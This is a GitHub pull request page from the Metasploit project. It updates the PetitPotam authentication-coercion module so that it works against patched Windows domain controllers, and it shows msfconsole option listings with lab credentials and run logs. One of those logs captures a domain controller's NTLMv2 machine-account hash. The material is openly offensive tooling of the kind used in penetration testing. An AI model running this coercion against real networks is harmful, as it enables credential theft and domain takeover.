Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Update PetitPotam For New Windows Servers #18622

Merged
merged 4 commits into from
Dec 15, 2023
Merged

Update PetitPotam For New Windows Servers #18622

merged 4 commits into from
Dec 15, 2023

Conversation

zeroSteiner
Copy link
Contributor

This makes an update to the PetitPotam module to enable it to target patched Windows Servers when provided the necessary authentication information. At some point between Windows Server build 10.0.17763.107 and 10.0.17763.3232 a change was made which required not only the SMB connection to be authenticated but also the inner DCERPC connection. The inner DCERPC connection must use RPC_C_AUTHN_LEVEL_PKT_PRIVACY, and RPC_C_AUTHN_WINNT to target these newer servers. To accommodate this, the Petit Potam module was switched to using RubySMB's DCERPC connection for named pipes which supports this authentication.

There a no changes necessary from a user perspective, the module will simply work now when targeting these newer servers.

Requires changes from:

Verification

  • Install a Windows Server Domain Controller with recent patches
  • Create a user account, no special privileges should be necessary
  • Start msfconsole
  • Run the petitpotam module with the credentials from the previous step
  • See that the module works, returning ERROR_BAD_NETPATH instead of ERROR_ACCESS_DENIED

New and working

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options 

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CHOST                       no        The local client address
   CPORT                       no        The local client port
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Old and broken

msf6 auxiliary(scanner/dcerpc/petitpotam) > show options 

Module options (auxiliary/scanner/dcerpc/petitpotam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LISTENER   192.168.159.11   yes       The host listening for the incoming connection
   METHOD     Automatic        yes       The RPC method to use for triggering (Accepted: Automatic, EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, EfsRpcDecryptFileSrv, EfsRpcQueryUsersOnFile, EfsRpcQueryRecoveryAgents)
   PIPE       efsrpc           yes       The named pipe to use for triggering (Accepted: lsarpc, efsrpc, samr, lsass, netlogon)
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  MSFLAB           no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    mhatter          no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/dcerpc/petitpotam) > run

[*] 192.168.159.10:445    - Binding to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Bound to df1941c5-fe89-4e79-bf10-463657acf44d:1.0@ncacn_np:192.168.159.10[\efsrpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcEncryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcDecryptFileSrv
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryUsersOnFile
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcQueryRecoveryAgents
[*] 192.168.159.10:445    - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) > 
```

@zeroSteiner
Update DCERPC to authenticate for newer targets
6bc3e1e 
Newer versions of Windows require the inner DCERPC connection to also be
authenticated. The prior version of the petitpotam module used Rex and
did not provide this authentication. Switching to RubySMB exposes this
functionality and allows the module to work on the latest versions of
Windows.
@zeroSteiner
Update petitpotam to use the refactored module
0023e19
zeroSteiner
zeroSteiner commented Dec 15, 2023
View reviewed changes
modules/auxiliary/scanner/dcerpc/petitpotam.rb
handle_args[:uuid],
# rename tree_file
@pipe = tree.open_file(filename: handle_args[:filename], write: true, read: true)
handle = dcerpc_handle(
Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Technically this handle isn't used for anything but printing stats information anymore. IMHO the verbosity with which it prints the endpoint and the UUID is extremely helpful in this scenario because the nature of the attack uses uncommon UUID and endpoint combinations. For that reason, I opted to keep this output.

@adfoster-r7
Copy link
Contributor

Works for me 👍

msf6 auxiliary(scanner/dcerpc/petitpotam) > run rhost=192.168.123.141 username=administrator password=p4$$w0rd7 listener=192.168.123.1

[*] 192.168.123.141:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.123.141[\lsarpc] ...
[*] 192.168.123.141:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.123.141[\lsarpc] ...
[*] 192.168.123.141:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.13
[SMB] NTLMv2-SSP Username   : ADF3\DC3$
[SMB] NTLMv2-SSP Hash       : DC3$::ADF3:8c988579fd463ef4:c2081cddd8442dc8c160f5709ff9b11e:010100000000000080fa11f8832fda01ac0f317f3cadb094000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080fa11f8832fda0106000400020000000800300030000000000000000000000000400000bda53062b69a3501947c650292069d6883377d638b3d4360233b820c68f9ff280a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[+] 192.168.123.141:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.123.141:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 auxiliary(scanner/dcerpc/petitpotam) >

It'd be cool to update these docs https://github.com/rapid7/metasploit-framework/blob/b019b2ff89bb66984560366d97a9722be5c1634f/documentation/modules/auxiliary/scanner/dcerpc/petitpotam.md to recommend using the auxiliary/server/capture/smb module or similar but LGTM

@adfoster-r7 adfoster-r7 merged commit c1186be into rapid7:master Dec 15, 2023
57 checks passed
@adfoster-r7
Copy link
Contributor

Release Notes

Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases

@zgoldman-r7 zgoldman-r7 added rn-fix release notes fix rn-enhancement release notes enhancement and removed rn-fix release notes fix labels Dec 21, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@zeroSteiner @adfoster-r7 @zgoldman-r7